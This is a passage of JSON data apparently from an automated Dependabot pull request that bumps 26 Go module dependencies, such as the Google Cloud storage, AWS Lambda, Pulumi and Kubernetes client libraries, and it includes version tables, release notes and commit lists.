ongodb.org/mongo-driver","old_version":"1.16.1","new_version":"1.17.9","repository_url":"https://github.com/mongodb/mongo-go-driver"},{"name":"k8s.io/apimachinery","old_version":"0.35.0","new_version":"0.36.0","repository_url":"https://github.com/kubernetes/apimachinery"},{"name":"k8s.io/client-go","old_version":"0.35.0","new_version":"0.36.0","repository_url":"https://github.com/kubernetes/client-go"}],"path":null,"ecosystem":"go"},"body":"Bumps the gomod-minor-and-patch group with 26 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [cloud.google.com/go/storage](https://github.com/googleapis/google-cloud-go) | `1.49.0` | `1.62.1` |\n| [github.com/MShekow/directory-checksum](https://github.com/MShekow/directory-checksum) | `1.4.9` | `1.4.18` |\n| [github.com/atombender/go-jsonschema](https://github.com/atombender/go-jsonschema) | `0.23.0` | `0.23.1` |\n| [github.com/aws/aws-lambda-go](https://github.com/aws/aws-lambda-go) | `1.47.0` | `1.54.0` |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.50.36` | `1.55.8` |\n| [github.com/aws/aws-secretsmanager-caching-go](https://github.com/aws/aws-secretsmanager-caching-go) | `1.1.3` | `1.2.0` |\n| [github.com/cloudflare/cloudflare-go](https://github.com/cloudflare/cloudflare-go) | `0.104.0` | `0.116.0` |\n| [github.com/disgoorg/disgo](https://github.com/disgoorg/disgo) | `0.18.5` | `0.19.3` |\n| [github.com/fatih/color](https://github.com/fatih/color) | `1.18.0` | `1.19.0` |\n| [github.com/go-git/go-billy/v5](https://github.com/go-git/go-billy) | `5.8.0` | `5.9.0` |\n| [github.com/go-git/go-git/v5](https://github.com/go-git/go-git) | `5.18.0` | `5.19.0` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.40.0` |\n| [github.com/otiai10/copy](https://github.com/otiai10/copy) | `1.14.0` | `1.14.1` |\n| [github.com/pulumi/pulumi-aws/sdk/v6](https://github.com/pulumi/pulumi-aws) | `6.83.0` | `6.83.3` |\n| [github.com/pulumi/pulumi-cloudflare/sdk/v6](https://github.com/pulumi/pulumi-cloudflare) | `6.2.0` | `6.15.0` |\n| [github.com/pulumi/pulumi-docker/sdk/v4](https://github.com/pulumi/pulumi-docker) | `4.5.8` | `4.11.2` |\n| [github.com/pulumi/pulumi-gcp/sdk/v8](https://github.com/pulumi/pulumi-gcp) | `8.0.0` | `8.41.1` |\n| [github.com/pulumi/pulumi-kubernetes/sdk/v4](https://github.com/pulumi/pulumi-kubernetes) | `4.18.1` | `4.30.0` |\n| [github.com/pulumi/pulumi-mongodbatlas/sdk/v3](https://github.com/pulumi/pulumi-mongodbatlas) | `3.30.0` | `3.38.0` |\n| [github.com/pulumi/pulumi-random/sdk/v4](https://github.com/pulumi/pulumi-random) | `4.17.0` | `4.19.2` |\n| [github.com/pulumi/pulumi/pkg/v3](https://github.com/pulumi/pulumi) | `3.184.0` | `3.237.0` |\n| [github.com/samber/lo](https://github.com/samber/lo) | `1.38.1` | `1.53.0` |\n| [github.com/tmc/langchaingo](https://github.com/tmc/langchaingo) | `0.1.13` | `0.1.14` |\n| [go.mongodb.org/mongo-driver](https://github.com/mongodb/mongo-go-driver) | `1.16.1` | `1.17.9` |\n| [k8s.io/apimachinery](https://github.com/kubernetes/apimachinery) | `0.35.0` | `0.36.0` |\n| [k8s.io/client-go](https://github.com/kubernetes/client-go) | `0.35.0` | `0.36.0` |\n\n\nUpdates `cloud.google.com/go/storage` from 1.49.0 to 1.62.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/f4b10eef3a7b114033d52c8d83ad43b105a150b3\"\u003e\u003ccode\u003ef4b10ee\u003c/code\u003e\u003c/a\u003e chore: librarian release pull request: 20260413T041034Z (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14421\"\u003e#14421\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/dc245af5198456acf9bdfae73d4158ad5c9f183c\"\u003e\u003ccode\u003edc245af\u003c/code\u003e\u003c/a\u003e feat(storage): add client feature tracking support (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14320\"\u003e#14320\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/cfdd7bad68d2e8e5aecbb7dc3a83ac73bedb57d0\"\u003e\u003ccode\u003ecfdd7ba\u003c/code\u003e\u003c/a\u003e chore(.github/CODEOWNERS): Add AION SDK as code owners for the auth library (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/e2d578ca0c118a7d1d8d5e7b44507b6ae3fdb6fe\"\u003e\u003ccode\u003ee2d578c\u003c/code\u003e\u003c/a\u003e test(datastore): skip flaky tests due to datastore contention (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14416\"\u003e#14416\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/56e1a627d59944afed2ec634cdd9a0f90a4902fc\"\u003e\u003ccode\u003e56e1a62\u003c/code\u003e\u003c/a\u003e chore: librarian release pull request: 20260409T222456Z (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14413\"\u003e#14413\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/5ca653ac3e0880547cd674747315007bbd253910\"\u003e\u003ccode\u003e5ca653a\u003c/code\u003e\u003c/a\u003e chore: regenerate libraries using protobuf 31, and update generation check wo...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/b4c40aab7f8a73c74b0f443149c33240aa3de7b6\"\u003e\u003ccode\u003eb4c40aa\u003c/code\u003e\u003c/a\u003e chore(all): update module go.opentelemetry.io/otel/sdk to v1.43.0 [SECURITY] ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/eb896d05d9f437e8f9550c4121f9dfc2337500d7\"\u003e\u003ccode\u003eeb896d0\u003c/code\u003e\u003c/a\u003e chore(deps): bump go.opentelemetry.io/otel/sdk from 1.42.0 to 1.43.0 in /comp...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/26c0341bb0ad65176f4de1e55a9c0d0297f49df4\"\u003e\u003ccode\u003e26c0341\u003c/code\u003e\u003c/a\u003e chore(deps): bump go.opentelemetry.io/otel/sdk from 1.42.0 to 1.43.0 in /cont...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/8a7febced0fc60e204c035798928e82ce53cf428\"\u003e\u003ccode\u003e8a7febc\u003c/code\u003e\u003c/a\u003e feat(firestore): Implement Search pipeline stage and related expressions (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14\"\u003e#14\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/googleapis/google-cloud-go/compare/pubsub/v1.49.0...storage/v1.62.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/MShekow/directory-checksum` from 1.4.9 to 1.4.18\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/MShekow/directory-checksum/releases\"\u003egithub.com/MShekow/directory-checksum's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.4.18\u003c/h2\u003e\n\u003ch2\u003eChangelog\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e4ce00c57b5c7d95d5341b2af5d33a125f1559b0b chore(deps): update goreleaser/goreleaser-action action to v7.2.1 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/122\"\u003e#122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e238103b19a4526004e8be9eaf8853668ab7fd9fd chore(deps): update go toolchain directive to v1.26.3 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/121\"\u003e#121\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ec4d0ac4ccbf366b722c91ad3b00febec87166f27 chore(deps): update robinraju/release-downloader action to v1.13 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/120\"\u003e#120\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e7cc7f005a503338f9980203ed35572d4f4d0d446 chore(deps): update goreleaser/goreleaser-action action to v7.1.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/119\"\u003e#119\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.4.17\u003c/h2\u003e\n\u003ch2\u003eChangelog\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eb5ec9cb649e9298e020b860d44de3655d8dc99db chore(deps): pin GitHub Actions digests (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/117\"\u003e#117\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e9e14614cba7ea4d2e45bff7d898976b472033023 chore: configure Renovate to pin GitHub Action digests\u003c/li\u003e\n\u003cli\u003ed0db2cce14af7ef180eab64db0a8f413a1b0a2bf chore(deps): update dependency go to v1.26.2 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/116\"\u003e#116\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ee7b210875c142a2858cccb0988451491413f064e chore(deps): update anchore/scan-action action to v7.4.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/115\"\u003e#115\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eebcb84ba64784235854e0e9aeed2270a8af825ad chore(deps): update anchore/sbom-action action to v0.24.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/114\"\u003e#114\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edb43f1ecb8acf2c8cf9fa982f75aa762503a563b chore(deps): update actions/setup-go action to v6.4.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/113\"\u003e#113\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ea3f08e15d4a61e1c01cd0fb911db75b13cf66145 chore(deps): update anchore/sbom-action action to v0.23.1 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/112\"\u003e#112\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e3dac27826410e350598c6aa2176dbaa05f6310f6 chore(deps): update dominikh/staticcheck-action action to v1.4.1 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/111\"\u003e#111\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e1c6495a73c454eac1d963a6d8c4e3eda0fb04ec6 chore(deps): update actions/attest-build-provenance action to v4.1.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/110\"\u003e#110\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eb51cc5cb9a579d6c7ba0d18da8d3ce983e46cfba chore(deps): update actions/attest-build-provenance action to v4 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/109\"\u003e#109\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e6c3b5f1771cf4d51dc2ed21e63a8f480b7a7d728 chore(deps): update actions/setup-go action to v6.3.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/108\"\u003e#108\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.4.16\u003c/h2\u003e\n\u003ch2\u003eChangelog\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e17f5c9e9ca5e402a02dddc513b235dbb27eac6c6 chore(deps): update anchore/sbom-action action to v0.23.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/107\"\u003e#107\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e05a7b47be8bcdaaf7107212e8304adae17cf9675 chore(deps): update dependency go to v1.26.1 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/106\"\u003e#106\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e1138ae7b4da6bea17e4c4cf98cf44f88de52f26b chore(deps): update goreleaser/goreleaser-action action to v7 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/105\"\u003e#105\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.4.15\u003c/h2\u003e\n\u003ch2\u003eChangelog\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ed3231e88115606eff0747a131104d3405d941633 chore(renovate): remove digest pinning from GHA\u003c/li\u003e\n\u003cli\u003ef821a8b45ec07ed8545950646f4bd61115595e00 chore: delete accidentally-committed file\u003c/li\u003e\n\u003cli\u003e068c44d880c0d8638e88d6f2a829f1fe0e20f159 ci: update GitHub action versions from digest to concrete semantic version\u003c/li\u003e\n\u003cli\u003eafc8dbe2c5780828c308a177d2db27bd44c90022 chore(deps): update dependency go to v1.26.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/99\"\u003e#99\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e0f4f17bdc2cf7aa323ba33c43bdf5506f594afd2 chore(deps): update anchore/sbom-action digest to deef08a (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/89\"\u003e#89\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e72ecf231f53888d31e777f32feeceb9f5b83543b chore(deps): update anchore/scan-action digest to 8d2fce0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/90\"\u003e#90\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ee65eaab36e0cbbdc3f2018c39695cd63be4d4fac chore(deps): update actions/setup-go digest to 7a3fe6c (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/91\"\u003e#91\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.4.14\u003c/h2\u003e\n\u003ch2\u003eChangelog\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e835dc1df98d09ea8dcb689bf7ec52255722d5118 chore(deps): update dependency go to v1.25.6 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e1f0a046b816e12c7d68aeb5b4e22d48de5f8d784 chore(deps): update dependency go to v1.25.6 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/94\"\u003e#94\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e1be2511f81925c1af8724c79af0791e39e24b228 chore(deps): update actions/checkout action to v6 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/93\"\u003e#93\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.4.13\u003c/h2\u003e\n\u003ch2\u003eChangelog\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ef138506bd6dac9fd15ba9aa284ac96e1f0087f21 chore(deps): update dependency go to v1.25.5 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/92\"\u003e#92\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ebca7d0f7ddedd418cd3ce2cd34795a1e6eab7478 chore(deps): update dependency go (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/87\"\u003e#87\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e8626fc7cf66f87d73abdf757cf0ee18155dac816 chore(deps): update actions/checkout digest to 93cb6ef (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/88\"\u003e#88\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ea82ae184c179610d72dda62204e0065c391232b9 chore(deps): update dependency go to v1.25.4 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/86\"\u003e#86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/4ce00c57b5c7d95d5341b2af5d33a125f1559b0b\"\u003e\u003ccode\u003e4ce00c5\u003c/code\u003e\u003c/a\u003e chore(deps): update goreleaser/goreleaser-action action to v7.2.1 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/122\"\u003e#122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/238103b19a4526004e8be9eaf8853668ab7fd9fd\"\u003e\u003ccode\u003e238103b\u003c/code\u003e\u003c/a\u003e chore(deps): update go toolchain directive to v1.26.3 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/121\"\u003e#121\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/c4d0ac4ccbf366b722c91ad3b00febec87166f27\"\u003e\u003ccode\u003ec4d0ac4\u003c/code\u003e\u003c/a\u003e chore(deps): update robinraju/release-downloader action to v1.13 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/120\"\u003e#120\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/7cc7f005a503338f9980203ed35572d4f4d0d446\"\u003e\u003ccode\u003e7cc7f00\u003c/code\u003e\u003c/a\u003e chore(deps): update goreleaser/goreleaser-action action to v7.1.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/119\"\u003e#119\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/b5ec9cb649e9298e020b860d44de3655d8dc99db\"\u003e\u003ccode\u003eb5ec9cb\u003c/code\u003e\u003c/a\u003e chore(deps): pin GitHub Actions digests (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/117\"\u003e#117\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/9e14614cba7ea4d2e45bff7d898976b472033023\"\u003e\u003ccode\u003e9e14614\u003c/code\u003e\u003c/a\u003e chore: configure Renovate to pin GitHub Action digests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/d0db2cce14af7ef180eab64db0a8f413a1b0a2bf\"\u003e\u003ccode\u003ed0db2cc\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency go to v1.26.2 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/116\"\u003e#116\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/e7b210875c142a2858cccb0988451491413f064e\"\u003e\u003ccode\u003ee7b2108\u003c/code\u003e\u003c/a\u003e chore(deps): update anchore/scan-action action to v7.4.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/115\"\u003e#115\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/ebcb84ba64784235854e0e9aeed2270a8af825ad\"\u003e\u003ccode\u003eebcb84b\u003c/code\u003e\u003c/a\u003e chore(deps): update anchore/sbom-action action to v0.24.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/114\"\u003e#114\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/db43f1ecb8acf2c8cf9fa982f75aa762503a563b\"\u003e\u003ccode\u003edb43f1e\u003c/code\u003e\u003c/a\u003e chore(deps): update actions/setup-go action to v6.4.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/113\"\u003e#113\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/MShekow/directory-checksum/compare/v1.4.9...v1.4.18\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/atombender/go-jsonschema` from 0.23.0 to 0.23.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/atombender/go-jsonschema/releases\"\u003egithub.com/atombender/go-jsonschema's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.23.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003echore(deps): update dependency shfmt to v3.13.1 by \u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/omissis/go-jsonschema/pull/539\"\u003eomissis/go-jsonschema#539\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): update dependency markdownlint-cli2 to v0.22.1 by \u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/omissis/go-jsonschema/pull/543\"\u003eomissis/go-jsonschema#543\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat/update-deps-2026-05-09 by \u003ca href=\"https://github.com/omissis\"\u003e\u003ccode\u003e@​omissis\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/omissis/go-jsonschema/pull/558\"\u003eomissis/go-jsonschema#558\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix bugs in codegen when the struct has additional fields and constraints at the same time. by \u003ca href=\"https://github.com/eliasdaler\"\u003e\u003ccode\u003e@​eliasdaler\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/omissis/go-jsonschema/pull/545\"\u003eomissis/go-jsonschema#545\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eliasdaler\"\u003e\u003ccode\u003e@​eliasdaler\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/omissis/go-jsonschema/pull/545\"\u003eomissis/go-jsonschema#545\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/omissis/go-jsonschema/compare/v0.23.0...v0.23.1\"\u003ehttps://github.com/omissis/go-jsonschema/compare/v0.23.0...v0.23.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/omissis/go-jsonschema/commit/5c08d7efc3b5e15bed8087f7b61ee495fc02e7ee\"\u003e\u003ccode\u003e5c08d7e\u003c/code\u003e\u003c/a\u003e fix: replace deprecated goreleaser --debug flag with --verbose\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/omissis/go-jsonschema/commit/90500159a9bb1a2db9b129d2fe7358840e8fc93d\"\u003e\u003ccode\u003e9050015\u003c/code\u003e\u003c/a\u003e fix: introduce specialized docker-container builder for buildx to make the sb...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/omissis/go-jsonschema/commit/07df3da82eec596d331373d5b612af8c138fddc2\"\u003e\u003ccode\u003e07df3da\u003c/code\u003e\u003c/a\u003e fix: introduce containerd as driver to work with sbom attestation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/omissis/go-jsonschema/commit/22aebdee3ae9ac352c1bb7b58ee1f346465352a0\"\u003e\u003ccode\u003e22aebde\u003c/code\u003e\u003c/a\u003e Fix bugs in codegen when the struct has additional fields and constraints at ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/omissis/go-jsonschema/commit/0827449a902130ff4b999ff11fa50c7c6cebd6d0\"\u003e\u003ccode\u003e0827449\u003c/code\u003e\u003c/a\u003e feat/update-deps-2026-05-09 (\u003ca href=\"https://redirect.github.com/atombender/go-jsonschema/issues/558\"\u003e#558\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/omissis/go-jsonschema/commit/d7e5ed13483f1389bcf6e3efe05812da0fe5ea88\"\u003e\u003ccode\u003ed7e5ed1\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency markdownlint-cli2 to v0.22.1 (\u003ca href=\"https://redirect.github.com/atombender/go-jsonschema/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/omissis/go-jsonschema/commit/74f12afe078525ec573a5a5393d4fe77eb8e75ce\"\u003e\u003ccode\u003e74f12af\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency shfmt to v3.13.1 (\u003ca href=\"https://redirect.github.com/atombender/go-jsonschema/issues/539\"\u003e#539\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/atombender/go-jsonschema/compare/v0.23.0...v0.23.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-lambda-go` from 1.47.0 to 1.54.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-lambda-go/releases\"\u003egithub.com/aws/aws-lambda-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.54.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAllow ClientContext.Custom unmarshaling for non-string (JSON) values by \u003ca href=\"https://github.com/M-Elsaeed\"\u003e\u003ccode\u003e@​M-Elsaeed\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/620\"\u003eaws/aws-lambda-go#620\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/M-Elsaeed\"\u003e\u003ccode\u003e@​M-Elsaeed\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/620\"\u003eaws/aws-lambda-go#620\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.54.0...v1.53.0\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.54.0...v1.53.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.53.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd S3 event optional fields by \u003ca href=\"https://github.com/yhamano0312\"\u003e\u003ccode\u003e@​yhamano0312\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/612\"\u003eaws/aws-lambda-go#612\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate workflows for go 1.26 by \u003ca href=\"https://github.com/bmoffatt\"\u003e\u003ccode\u003e@​bmoffatt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/617\"\u003eaws/aws-lambda-go#617\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix spelling typos by \u003ca href=\"https://github.com/magnetikonline\"\u003e\u003ccode\u003e@​magnetikonline\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/616\"\u003eaws/aws-lambda-go#616\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for Cognito Inbound federation Lambda trigger by \u003ca href=\"https://github.com/maximrub\"\u003e\u003ccode\u003e@​maximrub\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/619\"\u003eaws/aws-lambda-go#619\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yhamano0312\"\u003e\u003ccode\u003e@​yhamano0312\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/612\"\u003eaws/aws-lambda-go#612\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/magnetikonline\"\u003e\u003ccode\u003e@​magnetikonline\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca 